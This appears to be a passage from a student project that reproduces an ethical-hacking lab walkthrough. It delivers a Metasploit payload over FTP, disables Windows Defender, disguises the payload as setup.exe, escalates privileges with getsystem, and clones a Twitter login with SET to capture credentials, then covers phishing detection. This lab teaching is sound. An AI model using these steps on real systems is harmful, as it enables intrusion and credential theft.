Figure 2.15 Screenshot of PLABKALI01: Initiating the auxiliary module execution.

Projektni zadatak: Naziv projektnog zadatka88


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 5

Notice that the command is successful, and the server has started.

Projektni zadatak: Naziv projektnog zadatka89


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.16 Screenshot of PLABKALI01: Showing the service listener has started.

Projektni zadatak: Naziv projektnog zadatka90


Ime i prezime, br.index
CS450 – Cloud Computing

Minimize the PLABKALI01 window.

Note: Do not close the Metasploit window or VNC window. Leave the devices you have powered on in
their current state and proceed to the next task.

 Task 3 - Download the Payload

After you have setup the FTP server, you need to download the file on the victim’s system. You do not
need an FTP client to download the file. In this task, you will use the Windows command prompt to
connect to the FTP server.

Note: In the real environment, you will probably not be the one who will be downloading the file on the
victim’s system. You will convince the victim to download the file. For the sake of completing this
exercise, you will download the file from the FTP server to the victim’s system.

To download the payload, perform the following steps:

 Step 1

Ensure that you have logged into PLABWIN10.

Projektni zadatak: Naziv projektnog zadatka91


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.17 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.

Projektni zadatak: Naziv projektnog zadatka92


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 2

Right-click the Windows charm and select Run.

Projektni zadatak: Naziv projektnog zadatka93


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.18 Screenshot of PLABWIN10: Selecting the Run option from the context menu.

Projektni zadatak: Naziv projektnog zadatka94


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 3

The Run dialog box is displayed. In the Open textbox, type the following:

cmd

Press Enter. Alternatively, you can click, OK.

Projektni zadatak: Naziv projektnog zadatka95


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.19 Screenshot of PLABWIN10: Showing the Run dialog box with the cmd command in the
Open textbox.

Projektni zadatak: Naziv projektnog zadatka96


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 4

The command prompt window is displayed. You will now connect with the FTP server and download
the file.

To connect with the FTP server, type the following command:

ftp 192.168.0.4

Press Enter.

Projektni zadatak: Naziv projektnog zadatka97


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.20 Screenshot of PLABWIN10: Using the command prompt to connect with the FTP server
192.168.0.4.

Projektni zadatak: Naziv projektnog zadatka98


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 5

You are now connected with the FTP server. You will now authenticate as the anonymous user. Type
the following name as the User:

anonymous

Press Enter.

Projektni zadatak: Naziv projektnog zadatka99


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.21 Screenshot of PLABWIN10: Entering the username as Anonymous to connect with the
FTP server.

Projektni zadatak: Naziv projektnog zadatka100


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 6

Next, you are prompted for the password. Leave it blank and press Enter.

You are now successfully authenticated with the FTP server.

Projektni zadatak: Naziv projektnog zadatka101


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.22 Screenshot of PLABWIN10: Showing the successful connection with the FTP server
192.168.0.4.

Projektni zadatak: Naziv projektnog zadatka102


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 7

You need to now list the files on the FTP server. To be able to do this, type the following command:

dir

Press Enter.

Projektni zadatak: Naziv projektnog zadatka103


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.23 Screenshot of PLABWIN10: Listing the files on the FTP server 192.168.0.4.

Projektni zadatak: Naziv projektnog zadatka104


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 8

Notice that the command generated an error. This is because of the Windows Security Alert dialog
box, which opened.

Keep the default settings, and click Allow Access to allow the application through the firewall.

Projektni zadatak: Naziv projektnog zadatka105


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.24 Screenshot of PLABWIN10: Clicking Allow access on the Windows Security Alert dialog
box.

Projektni zadatak: Naziv projektnog zadatka106


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 9

Once again, type the following command:

dir

Press Enter. Notice that the payload.exe is present on the FTP server.

Projektni zadatak: Naziv projektnog zadatka107


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.25 Screenshot of PLABWIN10: Listing the files on the FTP server 192.168.0.4.

Projektni zadatak: Naziv projektnog zadatka108


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 10

Now, set the transfer to binary by typing the following command:

binary

Press Enter.

The Type of file download is now set to binary.

Projektni zadatak: Naziv projektnog zadatka109


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.26 Screenshot of PLABWIN10: Showing the TYPE set as binary.

Projektni zadatak: Naziv projektnog zadatka110


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 11

Next, transfer the file on to the victim’s system. Type the following command:

get payload.exe

Press Enter.

The transfer is successful.

Projektni zadatak: Naziv projektnog zadatka111


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.27 Screenshot of PLABWIN10: Showing the successful transfer of the payload.exe.

Projektni zadatak: Naziv projektnog zadatka112


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 12

You can now safely close the FTP server. Type the following command:

quit

Press Enter.

Projektni zadatak: Naziv projektnog zadatka113


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.28 Screenshot of PLABWIN10: Entering the quit command to exit from the FTP server.

Projektni zadatak: Naziv projektnog zadatka114


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 13

Notice that the FTP prompt is no longer available. You are back on the command prompt. Minimize
the command prompt window.

Projektni zadatak: Naziv projektnog zadatka115


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.29 Screenshot of PLABWIN10: Showing the closed session with the FTP server.
Leave the devices you have powered on in their current state and proceed to the next task.

Projektni zadatak: Naziv projektnog zadatka116


Ime i prezime, br.index
CS450 – Cloud Computing

 Task 4 - Execute the Payload

After creating and copying the payload to the user’s system, you need to trigger the payload. In a real-
life scenario, it will be the user who will be triggering the payload. You will now simulate the same
behavior in this task and execute the payload.

To execute the payload, perform the following steps:

 Step 1

Ensure you are connected to PLABWIN10.

Click Start and type the following.

Windows Defender

Press Enter.

Projektni zadatak: Naziv projektnog zadatka117


Ime i prezime, br.index
CS450 – Cloud Computing

Projektni zadatak: Naziv projektnog zadatka118


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.30 Screenshot of PLABWIN10: Displaying opening Windows Defender

 Step 2

In the Windows Defender window, select Open Windows Defender Security Center.

Projektni zadatak: Naziv projektnog zadatka119


Ime i prezime, br.index
CS450 – Cloud Computing

Projektni zadatak: Naziv projektnog zadatka120


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.31 Screenshot of PLABWIN10: Displaying opening Windows Defender Security Center.

 Step 3

In Windows Defender Security Center select Virus & threat protection

Projektni zadatak: Naziv projektnog zadatka121


Ime i prezime, br.index
CS450 – Cloud Computing

Projektni zadatak: Naziv projektnog zadatka122


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.32 Screenshot of PLABWIN10: Displaying Windows Defender Security Center

 Step 4

In Virus & threat protection select Virus & threat protection settings

Projektni zadatak: Naziv projektnog zadatka123


Ime i prezime, br.index
CS450 – Cloud Computing

Projektni zadatak: Naziv projektnog zadatka124


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.33 Screenshot of PLABWIN10: Displaying opening Virus & threat protection settings

 Step 5

In Virus & threat protection settings turn-off Real-time protection

Projektni zadatak: Naziv projektnog zadatka125


Ime i prezime, br.index
CS450 – Cloud Computing

Projektni zadatak: Naziv projektnog zadatka126


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.34 Screenshot of PLABWIN10: Displaying turning off Real-time protection.


Note: For the exploit to work, Windows Defender needs to be turned off in the lab environment. In a
real-life scenario, the malicious payload will be disguised as a legitimate application that needs to be
installed, thus circumventing Windows Defender.

 Step 6

Close Windows Defender Security Center.

Projektni zadatak: Naziv projektnog zadatka127


Ime i prezime, br.index
CS450 – Cloud Computing

Projektni zadatak: Naziv projektnog zadatka128


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.35 Screenshot of PLABWIN10: Displaying turning off Real-time protection.

 Step 7

Open File Explorer from the taskbar and navigate to the following path:

C:\Users\Administrator.PRACTICELABS

Notice that the payload file is present.

Projektni zadatak: Naziv projektnog zadatka129


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.36 Screenshot of PLABWIN10: Showing the successful download of the payload.exe on the
Administrator.PRACTICELABS Windows system in This PC.

Projektni zadatak: Naziv projektnog zadatka130


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 8

Move the file to the Downloads folder by dragging it.

Projektni zadatak: Naziv projektnog zadatka131


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.37 Screenshot of PLABWIN10: Moving the file, payload.exe, to the Downloads folder.

Projektni zadatak: Naziv projektnog zadatka132


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 9

Navigate to the Downloads folder. Notice that the payload is now present in this folder.

Projektni zadatak: Naziv projektnog zadatka133


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.38 Screenshot of PLABWIN10: Showing the file, payload.exe, in the Downloads folder.

Projektni zadatak: Naziv projektnog zadatka134


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 10

Now rename the file to setup.

Note: You can rename the file by selecting it and pressing F2. In some laptop makes, you may need to
press Fn + F2. Alternatively, you can right-click the file and select Rename.

Projektni zadatak: Naziv projektnog zadatka135


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.39 Screenshot of PLABWIN10: Renaming the file payload.exe, to setup.exe.

Projektni zadatak: Naziv projektnog zadatka136


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 11

Then, double-click the file to execute it.

Projektni zadatak: Naziv projektnog zadatka137


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.40 Screenshot of PLABWIN10: Clicking the file, setup.exe, to execute it. Closing the File
Explorer Window.

Projektni zadatak: Naziv projektnog zadatka138


Ime i prezime, br.index
CS450 – Cloud Computing

Close the File Explorer window.

 Step 12

Switch back to the Kali Linux window. Notice that the connection with the victim’s system is already
opened.

Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window
open. Do NOT shut it down or exit from it.Alert: If you double-click more than once on the setup file,
more than one meterpreter sessions will be opened.

Projektni zadatak: Naziv projektnog zadatka139


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.41 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the setup.exe file is executed.

Projektni zadatak: Naziv projektnog zadatka140


Ime i prezime, br.index
CS450 – Cloud Computing

Leave the devices you have powered on in their current state and proceed to the next task.

 Task 5 - Collect Evidence of Compromise on User’s System

The payload is now running on the victim’s system. You need to exploit the victim’s system now.

To exploit a victim’s system, perform the following steps:

 Step 1

Ensure that you are connected to PLABKALI01. You need to open the session with the victim’s
system now.

Press Enter in the terminal and type the following command:

sessions -i 1

Press Enter.

The session is now successfully established.

Projektni zadatak: Naziv projektnog zadatka141


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.42 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the setup.exe file is executed.

Projektni zadatak: Naziv projektnog zadatka142


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 2

Notice the interaction with the victim’s system has now started. You are now virtually controlling the
victim’s system. Let’s see the processes that are running on the victim’s system.

Type the following command:

ps

Press Enter.

Projektni zadatak: Naziv projektnog zadatka143


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.43 Screenshot of PLABWIN10: Entering the ps command to view the running processes.

Projektni zadatak: Naziv projektnog zadatka144


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 3

Notice that the processes running on the victim’s system are now displayed. It is important to note the
running process, setup.exe, which is the payload that you have executed on the victim’s system.

Projektni zadatak: Naziv projektnog zadatka145


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.44 Screenshot of PLABKALI01: Listing the running processes on the victim’s system.

Projektni zadatak: Naziv projektnog zadatka146


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 4

Next, you need to escalate privileges. Type the following command:

getsystem

Press Enter.

The result shows success in privileges escalation.

Projektni zadatak: Naziv projektnog zadatka147


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.45 Screenshot of PLABKALI01: Showing the success in a privilege escalation on the system.

Projektni zadatak: Naziv projektnog zadatka148


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 5

Let’s now check if the victim’s system has a webcam and take a picture. To check this, enter the
following command:

webcam_snap

Press Enter.

Notice the output, which states that the victim’s system does not have a webcam.

Projektni zadatak: Naziv projektnog zadatka149


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.46 Screenshot of PLABKALI01: Output showing the victim’s system does not have a
webcam.

Projektni zadatak: Naziv projektnog zadatka150


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 6

You can now exit from the meterpreter prompt. Type the following command:

exit

Press Enter.

Projektni zadatak: Naziv projektnog zadatka151


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.47 Screenshot of PLABKALI01: Entering the exit command to exit from the meterpreter
prompt.

Projektni zadatak: Naziv projektnog zadatka152


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 7

Clear the screen by entering the following command:

clear

You can also exit from the Metasploit framework prompt. Type the following command:

exit -y

Press Enter.

Note: You have an open session with the target system. Therefore, the exit command will not work. You
need to use the above-mentioned command.

Projektni zadatak: Naziv projektnog zadatka153


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.48 Screenshot of PLABKALI01: Entering the exit -y command to exit from the msf5 prompt.

Projektni zadatak: Naziv projektnog zadatka154


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 8

Press Enter once again.

You are back on the set command prompt.

Projektni zadatak: Naziv projektnog zadatka155


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.49 Screenshot of PLABKALI01: Showing the set prompt.

Projektni zadatak: Naziv projektnog zadatka156


Ime i prezime, br.index
CS450 – Cloud Computing

Keep the terminal window open.

 Task 6 - Conduct Social Engineering Using a Cloned Website

A cloned Website is a phishing Website that resembles the original and steals the users credentials, this
is also known as a spoofed Website. In this type of attack, the attacker clones legitimate Websites and
sets up the cloned Website with a URL resembling the legitimate Website’s URL. For example, the
spoofed Website would be www.htomail.com instead of www.hotmail.com, which is the legitimate
Website. The URL of the spoofed Website is shared with the targeted users via E-mail. When the user
clicks on the URL, the user cannot tell the difference between the spoofed or the legitimate Website,
unless the user pays attention to the URL.

In this task, you will set up a spoofed or cloned Website and capture user credentials.

To do this, perform the following steps:

 Step 1

Ensure you have powered on all the devices listed in the introduction and connect to PLABKALI01.

Ensure that the terminal window is displayed with the set prompt.

Projektni zadatak: Naziv projektnog zadatka157


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.50 Screenshot of PLABKALI01: Showing the set prompt.

Projektni zadatak: Naziv projektnog zadatka158


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 2

There are various methods that you can use to conduct a social engineering attack. In this step, you will
choose Website Attack Vectors, which will allow you to launch an attack using a Website that will be
generated by SET. Type the following:

Press Enter.

Projektni zadatak: Naziv projektnog zadatka159


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.51 Screenshot of PLABKALI01: Typing 2 to choose Website Attack Vectors, which will
allow you to launch an attack using a Website that will be generated by SET and pressing Enter.

Projektni zadatak: Naziv projektnog zadatka160


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 3

Next, you need to choose a method to clone a Website that requires user credentials from a user. Your
aim is to capture the user credentials that the user will feed into the cloned Website. To be able to do
this, type the following:

Press Enter.

Projektni zadatak: Naziv projektnog zadatka161


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.52 Screenshot of PLABKALI01: Typing 3 to choose a method to clone a Website that
requires user credentials from a user and pressing Enter.

Projektni zadatak: Naziv projektnog zadatka162


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 4

SET has pre-defined templates of some of the most widely used Websites. Therefore, you would use a
template and clone the Website. To do this, type the following:

Press Enter.

Projektni zadatak: Naziv projektnog zadatka163


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.53 Screenshot of PLABKALI01: Typing 1 to select the Web Templates method to clone a
Website based on a template and pressing Enter.

Projektni zadatak: Naziv projektnog zadatka164


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 5

Type the following IP address for the PLABKALI01 system:

192.168.0.4

Press Enter.

Projektni zadatak: Naziv projektnog zadatka165


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.54 Screenshot of PLABKALI01: Entering the IP address of PLABKALI01.

Projektni zadatak: Naziv projektnog zadatka166


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 6

You need to select the pre-defined template. Press the following key:

Press Enter.

Projektni zadatak: Naziv projektnog zadatka167


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.55 Screenshot of PLABKALI01: Typing 3 to select a pre-defined template and pressing Enter.

Projektni zadatak: Naziv projektnog zadatka168


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 7

On the next screen, press Enter.

Projektni zadatak: Naziv projektnog zadatka169


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.56 Screenshot of PLABKALI01: Pressing the Enter key.

Projektni zadatak: Naziv projektnog zadatka170


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 8

Notice that Credential Harvester has started on port 80.

Typically, you would send the URL or the cloned Website link to the user via an E-mail. In this lab
environment, you will test out how the process works.

Connect to PLABWIN10

Projektni zadatak: Naziv projektnog zadatka171


Ime i prezime, br.index
CS450 – Cloud Computing

Projektni zadatak: Naziv projektnog zadatka172


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.57 Screenshot of PLABWIN10: Displaying the Desktop

 Step 9

Open the Edge browser from the Taskbar and browse to the following site:

http://192.168.0.4

Projektni zadatak: Naziv projektnog zadatka173


Ime i prezime, br.index
CS450 – Cloud Computing

Projektni zadatak: Naziv projektnog zadatka174


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.58 Screenshot of PLABWIN10: Displaying browsing to the spoofed web address.
Note: In a real-world scenario, the user would be tricked to browsing to the website impersonating the
original website through an email or a phone call. The malicious attacker will modify the
impersonating website to resemble the original website as close as possible.

 Step 10

Notice that the Website is not exactly the replica of Twitter, but it has all the fields that you require to
capture information.

Scroll down to the Username text box, type the following name:

mjfox

In the Password text box, type the following password:

password

Click Sign In.

Note: You can use any username and password. Avoid using a real username and password. If
prompted to save password, click No.

Projektni zadatak: Naziv projektnog zadatka175


Ime i prezime, br.index
CS450 – Cloud Computing

Projektni zadatak: Naziv projektnog zadatka176


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.59 Screenshot of PLABWIN10: Entering the user credentials on the displayed Webpage.
Note: After signing in, the page may come up with a Can’t connect securely to this page notice. This
will not affect the PLABKALI01 output.

 Step 11

Switch back to PLABKALI01

In the terminal window notice that the username and password has been captured.

Projektni zadatak: Naziv projektnog zadatka177


Ime i prezime, br.index
CS450 – Cloud Computing

Projektni zadatak: Naziv projektnog zadatka178


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.60: Screenshot of PLABKALI01: Showing the captured user credentials in the terminal
window.

Close the terminal window.

6.2 EXERCISE 3 - PREVENTING SOCIAL ENGINEERING EXPLOITATION

Social engineering is a method to convince a user to share confidential information, which could be
official or personal. For example, you could receive an E-mail claiming that your bank account is
locked or frozen. You need to click on the given URL and provide your credentials to unlock your bank
account. This can be a tricky situation for many users as they get apprehended and without a second
thought, click on the URL and share the user credentials. This method is called Phishing, which is one
of the methods of social engineering covered earlier in this module.

There are several methods that allow you to detect phishing; either by using a toolbar or through a
Website that specializes in detecting phished Websites.

In this exercise, you will learn to detect phished Websites.

 Learning Outcomes
After completing this exercise, you will be able to:

 Use the Netcraft Toolbar


 Use the PhishTank Website

 Your Devices
You will be using the following devices in this lab. Please power on this device.

 PLABDC01 - (Windows Server 2019 - Domain Controller)


 PLABKALI01 - (Kali 2019.2 - Linux Kali Workstation)
 PLABWIN10 - (Windows 10 - Domain Member)

 Task 1 - Install Firefox

Projektni zadatak: Naziv projektnog zadatka179


Ime i prezime, br.index
CS450 – Cloud Computing

Firefox is a Web browser developed by Mozilla.

In this task, you will learn to install Firefox. To do this, perform the following steps:

 Step 1

Ensure that you have logged into PLABWIN10.

Click the Microsoft Edge icon in the taskbar.

Projektni zadatak: Naziv projektnog zadatka180


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.1 Screenshot of PLABWIN10: Displaying the PLABWIN10 desktop. Microsoft Edge is
selected.

Projektni zadatak: Naziv projektnog zadatka181


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 2

After the Intranet Website has loaded, click Installation_Files.

Projektni zadatak: Naziv projektnog zadatka182


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.2 Screenshot of PLABWIN10: Clicking the Installation_Files link.

Projektni zadatak: Naziv projektnog zadatka183


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 3

On the Installation_Files page, click Firefox.

Projektni zadatak: Naziv projektnog zadatka184


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.3 Screenshot of PLABWIN10: Clicking the Firefox link.

Projektni zadatak: Naziv projektnog zadatka185


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 4

On the Firefox page, click Firefox Setup 67.0.exe.

Projektni zadatak: Naziv projektnog zadatka186


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.4 Screenshot of PLABWIN10: Clicking the Firefox Setup 67.0.exe link.

Projektni zadatak: Naziv projektnog zadatka187


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 5

In the notification bar, click Run.

Projektni zadatak: Naziv projektnog zadatka188


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.5 Screenshot of PLABWIN10: Clicking Run in the notification bar.

Projektni zadatak: Naziv projektnog zadatka189


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 6

A dialog box displays the file extraction in progress.

Projektni zadatak: Naziv projektnog zadatka190


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.6 Screenshot of PLABWIN10: Showing a dialog box with the file extraction progress.

Projektni zadatak: Naziv projektnog zadatka191


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 7

The Mozilla Firefox Setup dialog box is displayed. On the Welcome to the Mozilla Firefox Setup
Wizard page, click Next.

Projektni zadatak: Naziv projektnog zadatka192


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.7 Screenshot of PLABWIN10: Clicking Next on the Welcome to the Mozilla Firefox Setup
Wizard page.

Projektni zadatak: Naziv projektnog zadatka193


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 8

On the Setup Type page, keep the default selection and click Next.

Projektni zadatak: Naziv projektnog zadatka194


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.8 Screenshot of PLABWIN10: Clicking Next on the Setup Type page.

Projektni zadatak: Naziv projektnog zadatka195


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 9

On the Summary page, click Install.

Projektni zadatak: Naziv projektnog zadatka196


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.9 Screenshot of PLABWIN10: Clicking Install on the Summary page.

Projektni zadatak: Naziv projektnog zadatka197


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 10

On the Installing page, the installation progress is displayed.

Projektni zadatak: Naziv projektnog zadatka198


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.10 Screenshot of PLABWIN10: Showing the installation progress on the Installing page.

Projektni zadatak: Naziv projektnog zadatka199


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 11

On the Completing the Mozilla Firefox Setup Wizard page, click Finish.

Projektni zadatak: Naziv projektnog zadatka200


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.11 Screenshot of PLABWIN10: Clicking Finish on the Completing the Mozilla Firefox Setup
Wizard page.

Projektni zadatak: Naziv projektnog zadatka201


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 12

Close the Microsoft Edge window.

Projektni zadatak: Naziv projektnog zadatka202


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.12 Screenshot of PLABWIN10: Closing the Microsoft Edge window.

Projektni zadatak: Naziv projektnog zadatka203


Ime i prezime, br.index
CS450 – Cloud Computing

 Task 2 - Use the Netcraft Toolbar

The Netcraft toolbar is designed to protect the users from phishing attacks. It is a Web browser plug-in
which detects a phished Website when you visit it.

In this task, you will learn to install and use the Netcraft toolbar. To do this, perform the following
steps:

 Step 1

The Microsoft Edge window opens. In the address bar, type the following URL:

toolbar.netcraft.com

Press Enter.

Projektni zadatak: Naziv projektnog zadatka204


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.13 Screenshot of PLABWIN10: Entering the URL for the Netcraft toolbar.

Projektni zadatak: Naziv projektnog zadatka205


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 2

The Netcraft Extension home page is displayed.

Click the Download the Netcraft Extension button.

Projektni zadatak: Naziv projektnog zadatka206


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.14 Screenshot of PLABWIN10: Clicking the Download the Netcraft Extension option.

Projektni zadatak: Naziv projektnog zadatka207


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 3

On the Download Now page, scroll down and click the Firefox icon.

Projektni zadatak: Naziv projektnog zadatka208


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.15 Screenshot of PLABWIN10: Clicking the Edge icon.

Projektni zadatak: Naziv projektnog zadatka209


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 4

On the Netcraft Extension page, click the Add to Firefox option.

Projektni zadatak: Naziv projektnog zadatka210


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.16 Screenshot of PLABWIN10: Clicking the Get icon.

Projektni zadatak: Naziv projektnog zadatka211


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 5

On the Add Netcraft Extension pop-up select Add.

Projektni zadatak: Naziv projektnog zadatka212


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.17 Screenshot of PLABWIN10: Clicking the Get icon.

Projektni zadatak: Naziv projektnog zadatka213


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 6

Notice that the Netcraft icon is now added on the right side of the toolbar in Microsoft Edge. Click
this icon.

Projektni zadatak: Naziv projektnog zadatka214


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.18 Screenshot of PLABWIN10: Showing the Netcraft icon on the right side of the toolbar in
Microsoft Edge.

Projektni zadatak: Naziv projektnog zadatka215


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 7

Since you are on the addons.mozilla.org, it provides the details for this Website.

Projektni zadatak: Naziv projektnog zadatka216


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.19 Screenshot of PLABWIN10: Clicking the Netcraft icon and finding the result about
Microsoft.com.

Projektni zadatak: Naziv projektnog zadatka217


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 8

In the address bar, type the following URL:

https://www.exploit-db.com

Press Enter.

Projektni zadatak: Naziv projektnog zadatka218


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.20 Screenshot of PLABWIN10: Entering a URL in the address bar.

Projektni zadatak: Naziv projektnog zadatka219


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 9

Click the Netcraft icon. Notice that the details about the Website are now displayed.

Projektni zadatak: Naziv projektnog zadatka220


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.21 Screenshot of PLABWIN10: Clicking the Netcraft icon and finding the result about
exploit-db.com.

Projektni zadatak: Naziv projektnog zadatka221


Ime i prezime, br.index
CS450 – Cloud Computing

Keep the Firefox window open.

 Task 3 - Use the PhishTank Website

PhishTank is a Website that contains a repository of the phished Websites. You can simply enter a
URL, and it will provide the details of whether it is phished or not.

In this task, you will use the PhishTank Website. To do this, perform the following steps:

 Step 1

Ensure that you have logged into PLABWIN10.

Ensure Firefox is open.

In the address bar, type the following URL:

https://www.phishtank.com

Press Enter.

Projektni zadatak: Naziv projektnog zadatka222


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.22 Screenshot of PLABWIN10: Entering the phishtank.com URL in the address bar.

Projektni zadatak: Naziv projektnog zadatka223


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 2

The PhishTank Website is displayed. In the Found a phishing site? text box, type the following URL:

http://testphp.vulnweb.com

Click Is it a phish?

Note: Either you can search for a Website or choose one from the given list.

Projektni zadatak: Naziv projektnog zadatka224


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.23 Screenshot of PLABWIN10: Entering a URL to test on the PhishTank website and clicking
the Is it a phish button.

Projektni zadatak: Naziv projektnog zadatka225


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 3

Notice that the result is displayed.

Projektni zadatak: Naziv projektnog zadatka226


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 3.24 Screenshot of PLABWIN10: Showing the result of the search.

Projektni zadatak: Naziv projektnog zadatka227


Ime i prezime, br.index
CS450 – Cloud Computing

 Review
Well done, you have completed the Social Engineering Practice Lab.

 Summary
You completed the following exercises:

 Exercise 1 - Social Engineering Types and Techniques


 Exercise 2 - Using the Social-Engineer Toolkit (SET)
 Exercise 3 - Preventing Social Engineering Exploitation

You should now be able to:

 Know the basic components of social engineering


 Know the motivation techniques
 Know phishing and its types
 Know hoax, baiting, shoulder surfing, tailgating
 Create a Malicious Payload
 Copy the File to the User’s System
 Download the Payload
 Execute the Payload
 Collect Evidence of Compromise on User’s System
 Conduct Social Engineering Using a Cloned Website
 Use the Netcraft Toolbar
 Use the PhishTank Website

 Feedback
Shutdown all virtual machines used in this lab. Alternatively, you can log out of the lab platform.

Projektni zadatak: Naziv projektnog zadatka228


Ime i prezime, br.index
CS450 – Cloud Computing

Practice Labs Ethical Hacker


 Conduct Social Engineering Attack
 Introduction
